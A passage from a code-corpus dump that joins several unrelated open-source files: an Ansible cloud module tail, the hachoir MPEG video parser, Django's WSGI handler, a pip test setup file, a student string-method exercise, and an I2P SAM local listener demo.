api_url: self.clc.defaults.ENDPOINT_URL_V2 = api_url if v2_api_token and clc_alias: self.clc._LOGIN_TOKEN_V2 = v2_api_token self.clc._V2_ENABLED = True self.clc.ALIAS = clc_alias elif v2_api_username and v2_api_passwd: self.clc.v2.SetCredentials( api_username=v2_api_username, api_passwd=v2_api_passwd) else: return self.module.fail_json( msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD " "environment variables") def _get_servers_from_clc(self, server_ids, message): """ Gets list of servers form CLC api """ try: return self.clc.v2.Servers(server_ids).servers except CLCException as exception: self.module.fail_json(msg=message + ': %s' % exception) @staticmethod def _set_user_agent(clc): if hasattr(clc, 'SetRequestsSession'): agent_string = "ClcAnsibleModule/" + __version__ ses = requests.Session() ses.headers.update({"Api-Client": agent_string}) ses.headers['User-Agent'] += " " + agent_string clc.SetRequestsSession(ses) def main(): """ The main function. Instantiates the module and calls process_request. :return: none """ module = AnsibleModule( argument_spec=ClcPublicIp._define_module_argument_spec(), supports_check_mode=True ) clc_public_ip = ClcPublicIp(module) clc_public_ip.process_request() if __name__ == '__main__': main()
coolbombom/CouchPotato
refs/heads/master
library/hachoir_parser/video/mpeg_video.py
86
""" Moving Picture Experts Group (MPEG) video version 1 and 2 parser. Information: - http://www.mpucoder.com/DVD/ - http://dvd.sourceforge.net/dvdinfo/ - http://www.mit.jyu.fi/mweber/leffakone/software/parsempegts/ - http://homepage.mac.com/rnc/EditMpegHeaderIFO.html - http://standards.iso.org/ittf/PubliclyAvailableStandards/c025029_ISO_IEC_TR_11172-5_1998(E)_Software_Simulation.zip This is a sample encoder/decoder implementation for MPEG-1. Author: Victor Stinner Creation date: 15 september 2006 """ from hachoir_parser import Parser from hachoir_parser.audio.mpeg_audio import MpegAudioFile from hachoir_core.field import (FieldSet, FieldError, ParserError, Bit, Bits, Bytes, RawBits, PaddingBits, NullBits, UInt8, UInt16, RawBytes, PaddingBytes, Enum) from hachoir_core.endian import BIG_ENDIAN from hachoir_core.stream import StringInputStream from hachoir_core.text_handler import textHandler, hexadecimal class FragmentGroup: def __init__(self, parser): self.items = [] self.parser = parser self.args = {} def add(self, item): self.items.append(item) def createInputStream(self): # FIXME: Use lazy stream creation data = [] for item in self.items: if 'rawdata' in item: data.append( item["rawdata"].value ) data = "".join(data) # FIXME: Use smarter code to send arguments tags = {"class": self.parser, "args": self.args} tags = tags.iteritems() return StringInputStream(data, "<fragment group>", tags=tags) class CustomFragment(FieldSet): def __init__(self, parent, name, size, parser, description=None, group=None): FieldSet.__init__(self, parent, name, description, size=size) if not group: group = FragmentGroup(parser) self.group = group self.group.add(self) def createFields(self): yield RawBytes(self, "rawdata", self.size//8) def _createInputStream(self, **args): return self.group.createInputStream() class Timestamp(FieldSet): static_size = 36 def createValue(self): return (self["c"].value << 30) + (self["b"].value << 15) + self["a"].value def createFields(self): yield Bits(self, "c", 3) yield Bit(self, "sync[]") # =True yield Bits(self, "b", 15) yield Bit(self, "sync[]") # =True yield Bits(self, "a", 15) yield Bit(self, "sync[]") # =True class SCR(FieldSet): static_size = 35 def createFields(self): yield Bits(self, "scr_a", 3) yield Bit(self, "sync[]") # =True yield Bits(self, "scr_b", 15) yield Bit(self, "sync[]") # =True yield Bits(self, "scr_c", 15) class PackHeader(FieldSet): def createFields(self): if self.stream.readBits(self.absolute_address, 2, self.endian) == 1: # MPEG version 2 yield Bits(self, "sync[]", 2) yield SCR(self, "scr") yield Bit(self, "sync[]") yield Bits(self, "scr_ext", 9) yield Bit(self, "sync[]") yield Bits(self, "mux_rate", 22) yield Bits(self, "sync[]", 2) yield PaddingBits(self, "reserved", 5, pattern=1) yield Bits(self, "stuffing_length", 3) count = self["stuffing_length"].value if count: yield PaddingBytes(self, "stuffing", count, pattern="\xff") else: # MPEG version 1 yield Bits(self, "sync[]", 4) yield Bits(self, "scr_a", 3) yield Bit(self, "sync[]") yield Bits(self, "scr_b", 15) yield Bit(self, "sync[]") yield Bits(self, "scr_c", 15) yield Bits(self, "sync[]", 2) yield Bits(self, "mux_rate", 22) yield Bit(self, "sync[]") def validate(self): if self["mux_rate"].value == 0: return "Invalid mux rate" sync0 = self["sync[0]"] if (sync0.size == 2 and sync0.value == 1): # MPEG2 pass if not self["sync[1]"].value \ or not self["sync[2]"].value \ or self["sync[3]"].value != 3: return "Invalid synchronisation bits" elif (sync0.size == 4 and sync0.value == 2): # MPEG1 if not self["sync[1]"].value \ or not self["sync[2]"].value \ or self["sync[3]"].value != 3 \ or not self["sync[4]"].value: return "Invalid synchronisation bits" else: return "Unknown version" return True class SystemHeader(FieldSet): def createFields(self): yield Bits(self, "marker[]", 1) yield Bits(self, "rate_bound", 22) yield Bits(self, "marker[]", 1) yield Bits(self, "audio_bound", 6) yield Bit(self, "fixed_bitrate") yield Bit(self, "csps", description="Constrained system parameter stream") yield Bit(self, "audio_lock") yield Bit(self, "video_lock") yield Bits(self, "marker[]", 1) yield Bits(self, "video_bound", 5) length = self['../length'].value-5 if length: yield RawBytes(self, "raw[]", length) class defaultParser(FieldSet): def createFields(self): yield RawBytes(self, "data", self["../length"].value) class Padding(FieldSet): def createFields(self): yield PaddingBytes(self, "data", self["../length"].value) class VideoExtension2(FieldSet): def createFields(self): yield Bit(self, "sync[]") # =True yield Bits(self, "ext_length", 7) yield NullBits(self, "reserved[]", 8) size = self["ext_length"].value if size: yield RawBytes(self, "ext_bytes", size) class VideoExtension1(FieldSet): def createFields(self): yield Bit(self, "has_private") yield Bit(self, "has_pack_lgth") yield Bit(self, "has_pack_seq") yield Bit(self, "has_pstd_buffer") yield Bits(self, "sync[]", 3) # =7 yield Bit(self, "has_extension2") if self["has_private"].value: yield RawBytes(self, "private", 16) if self["has_pack_lgth"].value: yield UInt8(self, "pack_lgth") if self["has_pack_seq"].value: yield Bit(self, "sync[]") # =True yield Bits(self, "pack_seq_counter", 7) yield Bit(self, "sync[]") # =True yield Bit(self, "mpeg12_id") yield Bits(self, "orig_stuffing_length", 6) if self["has_pstd_buffer"].value: yield Bits(self, "sync[]", 2) # =1 yield Enum(Bit(self, "pstd_buffer_scale"), {True: "128 bytes", False: "1024 bytes"}) yield Bits(self, "pstd_size", 13) class VideoSeqHeader(FieldSet): ASPECT=["forbidden", "1.0000 (VGA etc.)", "0.6735", "0.7031 (16:9, 625line)", "0.7615", "0.8055", "0.8437 (16:9, 525line)", "0.8935", "0.9157 (CCIR601, 625line)", "0.9815", "1.0255", "1.0695", "1.0950 (CCIR601, 525line)", "1.1575", "1.2015", "reserved"] FRAMERATE=["forbidden", "23.976 fps", "24 fps", "25 fps", "29.97 fps", "30 fps", "50 fps", "59.94 fps", "60 fps"] def createFields(self): yield Bits(self, "width", 12) yield Bits(self, "height", 12) yield Enum(Bits(self, "aspect", 4), self.ASPECT) yield Enum(Bits(self, "frame_rate", 4), self.FRAMERATE) yield Bits(self, "bit_rate", 18, "Bit rate in units of 50 bytes") yield Bits(self, "sync[]", 1) # =1 yield Bits(self, "vbv_size", 10, "Video buffer verifier size, in units of 16768") yield Bit(self, "constrained_params_flag") yield Bit(self, "has_intra_quantizer") if self["has_intra_quantizer"].value: for i in range(64): yield Bits(self, "intra_quantizer[]", 8) yield Bit(self, "has_non_intra_quantizer") if self["has_non_intra_quantizer"].value: for i in range(64): yield Bits(self, "non_intra_quantizer[]", 8) class GroupStart(FieldSet): def createFields(self): yield Bit(self, "drop_frame") yield Bits(self, "time_hh", 5) yield Bits(self, "time_mm", 6) yield PaddingBits(self, "time_pad[]", 1) yield Bits(self, "time_ss", 6) yield Bits(self, "time_ff", 6) yield Bit(self, "closed_group") yield Bit(self, "broken_group") yield PaddingBits(self, "pad[]", 5) class PacketElement(FieldSet): def createFields(self): yield Bits(self, "sync[]", 2) # =2 if self["sync[0]"].value != 2: raise ParserError("Unknown video elementary data") yield Bits(self, "is_scrambled", 2) yield Bits(self, "priority", 1) yield Bit(self, "alignment") yield Bit(self, "is_copyrighted") yield Bit(self, "is_original") yield Bit(self, "has_pts", "Presentation Time Stamp") yield Bit(self, "has_dts", "Decode Time Stamp") yield Bit(self, "has_escr", "Elementary Stream Clock Reference") yield Bit(self, "has_es_rate", "Elementary Stream rate") yield Bit(self, "dsm_trick_mode") yield Bit(self, "has_copy_info") yield Bit(self, "has_prev_crc", "If True, previous PES packet CRC follows") yield Bit(self, "has_extension") yield UInt8(self, "size") # Time stamps if self["has_pts"].value: yield Bits(self, "sync[]", 4) # =2, or 3 if has_dts=True yield Timestamp(self, "pts") if self["has_dts"].value: if not(self["has_pts"].value): raise ParserError("Invalid PTS/DTS values") yield Bits(self, "sync[]", 4) # =1 yield Timestamp(self, "dts") if self["has_escr"].value: yield Bits(self, "sync[]", 2) # =0 yield SCR(self, "escr") if self["has_es_rate"].value: yield Bit(self, "sync[]") # =True yield Bits(self, "es_rate", 14) # in units of 50 bytes/second yield Bit(self, "sync[]") # =True if self["has_copy_info"].value: yield Bit(self, "sync[]") # =True yield Bits(self, "copy_info", 7) if self["has_prev_crc"].value: yield textHandler(UInt16(self, "prev_crc"), hexadecimal) # --- Extension --- if self["has_extension"].value: yield VideoExtension1(self, "extension") if self["extension/has_extension2"].value: yield VideoExtension2(self, "extension2") class VideoExtension(FieldSet): EXT_TYPE = {1:'Sequence',2:'Sequence Display',8:'Picture Coding'} def createFields(self): yield Enum(Bits(self, "ext_type", 4), self.EXT_TYPE) ext_type=self['ext_type'].value if ext_type==1: # Sequence extension yield Bits(self, 'profile_and_level', 8) yield Bit(self, 'progressive_sequence') yield Bits(self, 'chroma_format', 2) yield Bits(self, 'horiz_size_ext', 2) yield Bits(self, 'vert_size_ext', 2) yield Bits(self, 'bit_rate_ext', 12) yield Bits(self, 'pad[]', 1) yield Bits(self, 'vbv_buffer_size_ext', 8) yield Bit(self, 'low_delay') yield Bits(self, 'frame_rate_ext_n', 2) yield Bits(self, 'frame_rate_ext_d', 5) elif ext_type==2: # Sequence Display extension yield Bits(self, 'video_format', 3) yield Bit(self, 'color_desc_present') if self['color_desc_present'].value: yield UInt8(self, 'color_primaries') yield UInt8(self, 'transfer_characteristics') yield UInt8(self, 'matrix_coeffs') yield Bits(self, 'display_horiz_size', 14) yield Bits(self, 'pad[]', 1) yield Bits(self, 'display_vert_size', 14) yield NullBits(self, 'pad[]', 3) elif ext_type==8: yield Bits(self, 'f_code[0][0]', 4, description="forward horizontal") yield Bits(self, 'f_code[0][1]', 4, description="forward vertical") yield Bits(self, 'f_code[1][0]', 4, description="backward horizontal") yield Bits(self, 'f_code[1][1]', 4, description="backward vertical") yield Bits(self, 'intra_dc_precision', 2) yield Bits(self, 'picture_structure', 2) yield Bit(self, 'top_field_first') yield Bit(self, 'frame_pred_frame_dct') yield Bit(self, 'concealment_motion_vectors') yield Bit(self, 'q_scale_type') yield Bit(self, 'intra_vlc_format') yield Bit(self, 'alternate_scan') yield Bit(self, 'repeat_first_field') yield Bit(self, 'chroma_420_type') yield Bit(self, 'progressive_frame') yield Bit(self, 'composite_display') if self['composite_display'].value: yield Bit(self, 'v_axis') yield Bits(self, 'field_sequence', 3) yield Bit(self, 'sub_carrier') yield Bits(self, 'burst_amplitude', 7) yield Bits(self, 'sub_carrier_phase', 8) yield NullBits(self, 'pad[]', 2) else: yield NullBits(self, 'pad[]', 6) else: yield RawBits(self, "raw[]", 4) class VideoPicture(FieldSet): CODING_TYPE = ["forbidden","intra-coded (I)", "predictive-coded (P)", "bidirectionally-predictive-coded (B)", "dc intra-coded (D)", "reserved", "reserved", "reserved"] def createFields(self): yield Bits(self, "temporal_ref", 10) yield Enum(Bits(self, "coding_type", 3), self.CODING_TYPE) yield Bits(self, "vbv_delay", 16) if self['coding_type'].value in (2,3): # predictive coding yield Bit(self, 'full_pel_fwd_vector') yield Bits(self, 'forward_f_code', 3) if self['coding_type'].value == 3: # bidi predictive coding yield Bit(self, 'full_pel_back_vector') yield Bits(self, 'backward_f_code', 3) yield Bits(self, "padding", 8-(self.current_size % 8)) class VideoSlice(FieldSet): def createFields(self): yield Bits(self, "quantizer_scale", 5) start=self.absolute_address+self.current_size+3 pos=self.stream.searchBytes('\0\0\1',start,start+1024*1024*8) # seek forward by at most 1MB if pos is None: pos=self.root.size yield RawBits(self, "data", pos-start+3) class VideoChunk(FieldSet): tag_info = { 0x00: ("pict_start[]", VideoPicture, "Picture start"), 0xB2: ("data_start[]", None, "Data start"), 0xB3: ("seq_hdr[]", VideoSeqHeader,"Sequence header"), 0xB4: ("seq_err[]", None, "Sequence error"), 0xB5: ("ext_start[]", VideoExtension,"Extension start"), 0xB7: ("seq_end[]", None, "Sequence end"), 0xB8: ("group_start[]", GroupStart, "Group start"), } def __init__(self, *args): FieldSet.__init__(self, *args) tag = self["tag"].value if tag in self.tag_info: self._name, self.parser, self._description = self.tag_info[tag] if not self.parser: self.parser = defaultParser elif 0x01 <= tag <= 0xaf: self._name, self.parser, self._description = ('slice[]', VideoSlice, 'Picture slice') else: self.parser = defaultParser def createFields(self): yield Bytes(self, "sync", 3) yield textHandler(UInt8(self, "tag"), hexadecimal) if self.parser and self['tag'].value != 0xb7: yield self.parser(self, "content") class VideoStream(Parser): endian = BIG_ENDIAN def createFields(self): while self.current_size < self.size: pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB if pos is not None: padsize = pos-self.current_size if padsize: yield PaddingBytes(self, "pad[]", padsize//8) yield VideoChunk(self, "chunk[]") class Stream(FieldSet): def createFields(self): padding=0 position=0 while True: next=ord(self.parent.stream.readBytes(self.absolute_address+self.current_size+position, 1)) if next == 0xff: padding+=1 position+=8 elif padding: yield PaddingBytes(self, "pad[]", padding) padding=None position=0 elif 0x40 <= next <= 0x7f: yield Bits(self, "scale_marker", 2) # 1 yield Bit(self, "scale") scale=self['scale'].value if scale: scaleval=1024 else: scaleval=128 yield textHandler(Bits(self, "size", 13), lambda field:str(field.value*scaleval)) elif 0x00 <= next <= 0x3f: yield Bits(self, "ts_marker", 2) # 0 yield Bit(self, "has_pts") yield Bit(self, "has_dts") if self['has_pts'].value: yield Timestamp(self, "pts") if self['has_dts'].value: yield PaddingBits(self, "pad[]", 4) yield Timestamp(self, "dts") if self.current_size % 8 == 4: yield PaddingBits(self, "pad[]", 4) break elif 0x80 <= next <= 0xbf: # MPEG-2 extension yield PacketElement(self, "pkt") break else: # 0xc0 - 0xfe: unknown break length = self["../length"].value - self.current_size//8 if length: tag=self['../tag'].value group=self.root.streamgroups[tag] parname=self.parent._name if parname.startswith('audio'): frag = CustomFragment(self, "data", length*8, MpegAudioFile, group=group) elif parname.startswith('video'): frag = CustomFragment(self, "data", length*8, VideoStream, group=group) else: frag = CustomFragment(self, "data", length*8, None, group=group) self.root.streamgroups[tag]=frag.group yield frag class Chunk(FieldSet): ISO_END_CODE = 0xB9 tag_info = { 0xB9: ("end", None, "End"), 0xBA: ("pack_start[]", PackHeader, "Pack start"), 0xBB: ("system_start[]", SystemHeader, "System start"), # streams 0xBD: ("private[]", Stream, "Private elementary"), 0xBE: ("padding[]", Stream, "Padding"), # 0xC0 to 0xFE handled specially 0xFF: ("directory[]", Stream, "Program Stream Directory"), } def __init__(self, *args): FieldSet.__init__(self, *args) if not hasattr(self.root,'streamgroups'): self.root.streamgroups={} for tag in range(0xBC, 0x100): self.root.streamgroups[tag]=None tag = self["tag"].value if tag in self.tag_info: self._name, self.parser, self._description = self.tag_info[tag] elif 0xBC <= tag <= 0xFF: if 0xC0 <= tag < 0xE0: # audio streamid = tag-0xC0 self._name, self.parser, self._description = ("audio[%i][]"%streamid, Stream, "Audio Stream %i Packet"%streamid) elif 0xE0 <= tag < 0xF0: # video streamid = tag-0xE0 self._name, self.parser, self._description = ("video[%i][]"%streamid, Stream, "Video Stream %i Packet"%streamid) else: self._name, self.parser, self._description = ("stream[]", Stream, "Data Stream Packet") else: self.parser = defaultParser if not self.parser: self.parser = defaultParser elif self.parser != PackHeader and "length" in self: self._size = (6 + self["length"].value) * 8 def createFields(self): yield Bytes(self, "sync", 3) yield textHandler(UInt8(self, "tag"), hexadecimal) if self.parser: if self.parser != PackHeader: yield UInt16(self, "length") if not self["length"].value: return yield self.parser(self, "content") def createDescription(self): return "Chunk: tag %s" % self["tag"].display class MPEGVideoFile(Parser): PARSER_TAGS = { "id": "mpeg_video", "category": "video", "file_ext": ("mpeg", "mpg", "mpe", "vob"), "mime": (u"video/mpeg", u"video/mp2p"), "min_size": 12*8, #TODO: "magic": xxx, "description": "MPEG video, version 1 or 2" } endian = BIG_ENDIAN version = None def createFields(self): while self.current_size < self.size: pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB if pos is not None: padsize = pos-self.current_size if padsize: yield PaddingBytes(self, "pad[]", padsize//8) chunk=Chunk(self, "chunk[]") try: # force chunk to be processed, so that CustomFragments are complete chunk['content/data'] except: pass yield chunk def validate(self): try: pack = self[0] except FieldError: return "Unable to create first chunk" if pack.name != "pack_start[0]": return "Invalid first chunk" if pack["sync"].value != "\0\0\1": return "Invalid synchronisation" return pack["content"].validate() def getVersion(self): if not self.version: if self["pack_start[0]/content/sync[0]"].size == 2: self.version = 2 else: self.version = 1 return self.version def createDescription(self): if self.getVersion() == 2: return "MPEG-2 video" else: return "MPEG-1 video"
hackerbot/DjangoDev
refs/heads/master
django/core/handlers/wsgi.py
339
from __future__ import unicode_literals import cgi import codecs import logging import sys from io import BytesIO from threading import Lock from django import http from django.conf import settings from django.core import signals from django.core.handlers import base from django.core.urlresolvers import set_script_prefix from django.utils import six from django.utils.encoding import force_str, force_text from django.utils.functional import cached_property logger = logging.getLogger('django.request') # encode() and decode() expect the charset to be a native string. ISO_8859_1, UTF_8 = str('iso-8859-1'), str('utf-8') class LimitedStream(object): ''' LimitedStream wraps another stream in order to not allow reading from it past specified amount of bytes. ''' def __init__(self, stream, limit, buf_size=64 * 1024 * 1024): self.stream = stream self.remaining = limit self.buffer = b'' self.buf_size = buf_size def _read_limited(self, size=None): if size is None or size > self.remaining: size = self.remaining if size == 0: return b'' result = self.stream.read(size) self.remaining -= len(result) return result def read(self, size=None): if size is None: result = self.buffer + self._read_limited() self.buffer = b'' elif size < len(self.buffer): result = self.buffer[:size] self.buffer = self.buffer[size:] else: # size >= len(self.buffer) result = self.buffer + self._read_limited(size - len(self.buffer)) self.buffer = b'' return result def readline(self, size=None): while b'\n' not in self.buffer and \ (size is None or len(self.buffer) < size): if size: # since size is not None here, len(self.buffer) < size chunk = self._read_limited(size - len(self.buffer)) else: chunk = self._read_limited() if not chunk: break self.buffer += chunk sio = BytesIO(self.buffer) if size: line = sio.readline(size) else: line = sio.readline() self.buffer = sio.read() return line class WSGIRequest(http.HttpRequest): def __init__(self, environ): script_name = get_script_name(environ) path_info = get_path_info(environ) if not path_info: # Sometimes PATH_INFO exists, but is empty (e.g. accessing # the SCRIPT_NAME URL without a trailing slash). We really need to # operate as if they'd requested '/'. Not amazingly nice to force # the path like this, but should be harmless. path_info = '/' self.environ = environ self.path_info = path_info # be careful to only replace the first slash in the path because of # http://test/something and http://test//something being different as # stated in http://www.ietf.org/rfc/rfc2396.txt self.path = '%s/%s' % (script_name.rstrip('/'), path_info.replace('/', '', 1)) self.META = environ self.META['PATH_INFO'] = path_info self.META['SCRIPT_NAME'] = script_name self.method = environ['REQUEST_METHOD'].upper() _, content_params = cgi.parse_header(environ.get('CONTENT_TYPE', '')) if 'charset' in content_params: try: codecs.lookup(content_params['charset']) except LookupError: pass else: self.encoding = content_params['charset'] self._post_parse_error = False try: content_length = int(environ.get('CONTENT_LENGTH')) except (ValueError, TypeError): content_length = 0 self._stream = LimitedStream(self.environ['wsgi.input'], content_length) self._read_started = False self.resolver_match = None def _get_scheme(self): return self.environ.get('wsgi.url_scheme') @cached_property def GET(self): # The WSGI spec says 'QUERY_STRING' may be absent. raw_query_string = get_bytes_from_wsgi(self.environ, 'QUERY_STRING', '') return http.QueryDict(raw_query_string, encoding=self._encoding) def _get_post(self): if not hasattr(self, '_post'): self._load_post_and_files() return self._post def _set_post(self, post): self._post = post @cached_property def COOKIES(self): raw_cookie = get_str_from_wsgi(self.environ, 'HTTP_COOKIE', '') return http.parse_cookie(raw_cookie) def _get_files(self): if not hasattr(self, '_files'): self._load_post_and_files() return self._files POST = property(_get_post, _set_post) FILES = property(_get_files) class WSGIHandler(base.BaseHandler): initLock = Lock() request_class = WSGIRequest def __call__(self, environ, start_response): # Set up middleware if needed. We couldn't do this earlier, because # settings weren't available. if self._request_middleware is None: with self.initLock: try: # Check that middleware is still uninitialized. if self._request_middleware is None: self.load_middleware() except: # Unload whatever middleware we got self._request_middleware = None raise set_script_prefix(get_script_name(environ)) signals.request_started.send(sender=self.__class__, environ=environ) try: request = self.request_class(environ) except UnicodeDecodeError: logger.warning('Bad Request (UnicodeDecodeError)', exc_info=sys.exc_info(), extra={ 'status_code': 400, } ) response = http.HttpResponseBadRequest() else: response = self.get_response(request) response._handler_class = self.__class__ status = '%s %s' % (response.status_code, response.reason_phrase) response_headers = [(str(k), str(v)) for k, v in response.items()] for c in response.cookies.values(): response_headers.append((str('Set-Cookie'), str(c.output(header='')))) start_response(force_str(status), response_headers) if getattr(response, 'file_to_stream', None) is not None and environ.get('wsgi.file_wrapper'): response = environ['wsgi.file_wrapper'](response.file_to_stream) return response def get_path_info(environ): """ Returns the HTTP request's PATH_INFO as a unicode string. """ path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '/') return path_info.decode(UTF_8) def get_script_name(environ): """ Returns the equivalent of the HTTP request's SCRIPT_NAME environment variable. If Apache mod_rewrite has been used, returns what would have been the script name prior to any rewriting (so it's the script name as seen from the client's perspective), unless the FORCE_SCRIPT_NAME setting is set (to anything). """ if settings.FORCE_SCRIPT_NAME is not None: return force_text(settings.FORCE_SCRIPT_NAME) # If Apache's mod_rewrite had a whack at the URL, Apache set either # SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any # rewrites. Unfortunately not every Web server (lighttpd!) passes this # information through all the time, so FORCE_SCRIPT_NAME, above, is still # needed. script_url = get_bytes_from_wsgi(environ, 'SCRIPT_URL', '') if not script_url: script_url = get_bytes_from_wsgi(environ, 'REDIRECT_URL', '') if script_url: path_info = get_bytes_from_wsgi(environ, 'PATH_INFO', '') script_name = script_url[:-len(path_info)] if path_info else script_url else: script_name = get_bytes_from_wsgi(environ, 'SCRIPT_NAME', '') return script_name.decode(UTF_8) def get_bytes_from_wsgi(environ, key, default): """ Get a value from the WSGI environ dictionary as bytes. key and default should be str objects. Under Python 2 they may also be unicode objects provided they only contain ASCII characters. """ value = environ.get(str(key), str(default)) # Under Python 3, non-ASCII values in the WSGI environ are arbitrarily # decoded with ISO-8859-1. This is wrong for Django websites where UTF-8 # is the default. Re-encode to recover the original bytestring. return value.encode(ISO_8859_1) if six.PY3 else value def get_str_from_wsgi(environ, key, default): """ Get a value from the WSGI environ dictionary as str. key and default should be str objects. Under Python 2 they may also be unicode objects provided they only contain ASCII characters. """ value = get_bytes_from_wsgi(environ, key, default) return value.decode(UTF_8, errors='replace') if six.PY3 else value
Carreau/pip
refs/heads/develop
tests/data/src/compilewheel/setup.py
54
#!/usr/bin/env python from setuptools import setup, find_packages setup(name='compilewheel', version='1.0', packages=find_packages() )
NoahFlowa/CTC_Projects
refs/heads/master
Osterhout_Python/Osterhout_OairedActivities.py
1
# Programmer: Noah Osterhout # Date: October 11th 2016 1:01PM EST # Project: Osterhout_OairedActivities.py # Activities 1 steve_jobs = "If today were the last day of my life, would I want to do what I\'m about to do today. And whenever that answer has been 'no' for too many days in a row, I know I need to change something. ~Steve Jobs" albert_einstein = "I know not with what weapons World War III will be fought, but World War IV will be fought with sticks and stones. ~Albert Einstein" jfk_quote = "Ask not what your country can do for you, ask what you can do for your country. ~JFK" bill_gates = "Success is a lousy teacher. It seduces smart people into thinking they can't lose." steve_woz = "Never trust a computer you can't throw out a window." elon_musk = "I would like to die on Mars. Just not on impact." print(steve_jobs) print(albert_einstein) print(jfk_quote) print() print("----------------------------------------------------------------") print() print(steve_jobs.lower()) print(albert_einstein.lower()) print(jfk_quote.lower()) print() print("----------------------------------------------------------------") print() print(steve_jobs.upper()) print(albert_einstein.upper()) print(jfk_quote.upper()) print() print("----------------------------------------------------------------") print() print(steve_jobs.swapcase()) print(albert_einstein.swapcase()) print(jfk_quote.swapcase()) print() print("----------------------------------------------------------------") print() print(""" The .upper() method works to make everything Upper Case. The .lower() method works to make everything Lower Case. The .swapcase() method works to make everything SwapCase. """) print() print("Author: Noah Osterhout, PM WGP, CTC") # Activities 2 print(bill_gates) print(steve_woz) print(elon_musk) print() print("----------------------------------------------------------------") print() print(bill_gates.capitalize()) print(steve_woz.capitalize()) print(elon_musk.capitalize()) print() print("----------------------------------------------------------------") print() print(bill_gates.title()) print(steve_woz.title()) print(elon_musk.title()) print() print("----------------------------------------------------------------") what = input("What quote do you want to use for Replace? (1 Bill Gates) (2 Steve Wozniak) (3 Elon Musk) \n") if what != 1: print(bill_gates) takeOut = input("What word do you want to take out from your Quote? ") #Asks what word the want from their Quote replaced and asks to type that Word in putIn = input("What word do you want to put in the Quote? ") #Asks for the word they want to put in their Quote bill_gates2 = bill_gates.replace(takeOut, putIn) print(bill_gates2) elif what != 2: print(steve_woz) takeOut = input("What word do you want to take out from your Quote? ") #Asks what word the want from their Quote replaced and asks to type that Word in putIn = input("What word do you want to put in the Quote? ") #Asks for the word they want to put in their Quote steve_woz2 = steve_woz.replace(takeOut, putIn) print(steve_woz2) elif what != 3: print(elon_musk) takeOut = input("What word do you want to take out from your Quote? ") #Asks what word the want from their Quote replaced and asks to type that Word in putIn = input("What word do you want to put in the Quote? ") #Asks for the word they want to put in their Quote elon_musk2 = elon_musk.replace(takeOut, putIn) print(elon_musk2) else: print("ERROR") print("----------------------------------------------------------------") print() print(""" The .capitalize() method works to make everything Upper Case. The .lower() method works to make everything Lower Case. The .swapcase() method works to make everything SwapCase. """) print() print("Author: Noah Osterhout, PM WGP, CTC")
NoYouShutup/CryptMeme
refs/heads/master
CryptMeme/apps/sam/Demos/rawTests/samIn.py
1
#!/usr/bin/python # create a SAM datagram session that writes incoming messages on its master session stream # and a listen forever # usage : ./samIn.py [session name] import socket import sys if len(sys.argv)==2 : name = sys.argv[1] else : name = "rawSamIn" sess = socket.socket( socket.AF_INET, socket.SOCK_STREAM) sess.connect(("127.0.0.1",7656)); sess.send("HELLO VERSION MIN=3.0 MAX=3.0\n") sys.stdout.write(sess.recv(1000)) sess.send("SESSION CREATE STYLE=RAW ID="+name+" DESTINATION=tYhjbFlFL38WFuO5eCzTvE0UBr4RfaqWMKlekGeMoB-Ouz7nYaWfiS-9j3jMiZT7FH~pwdmoSREOs2ZbXK84sR59P~pPfeCMxnJrk57f3U9uKzXkesjkKWYco3YAGs-G8sw8Fu2FBx0Do57yBdA9~j8Zq6pMjmgPBXCLuXG3vo0Z8zUWCjApJyFY6OXYopHck9Fz9vKy7YhC6zXFHfEuNHVkAooduiLd~aCoGij0TW3lH2rTVU-lx-DUdi6edxQ5-RvDNkXfikvytoCpRkivbNVytjCJLk~7RNU4FpBD20wTZWNJmEG3OY3cjNjawJVFdNjtgczh9K7gZ7ad-NjVjZVhXEj1lU8mk~vAH-2QE5om8dstWUwWoNDwmVDlvIJNKzQmahG~VrpFexFHXO0n3fKIXcSgWGOHDExM8w9neCt7AxUjxPDtXXuYNW~bRwcfiL-C9~z4K9rmwiTPZX0lmsToSXTF28l7WAoj~TMT9kZAjQeFRRWU5oW5oxVuonVvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABngJSS8xMyF4t82otZmCDhrKjbm-QLMtOLoumwR28ebDHEd4clF6O7aRa3d3yRH7p\n") sys.stdout.write(sess.recv(1000)) # listen incoming messages while 1 : chunk = sess.recv(10000) sys.stdout.write(chunk+'\n') if not chunk : break print
PeterWangIntel/blink-crosswalk
refs/heads/master
Tools/Scripts/webkitpy/common/net/layouttestresults_unittest.py
37
# Copyright (c) 2010, Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 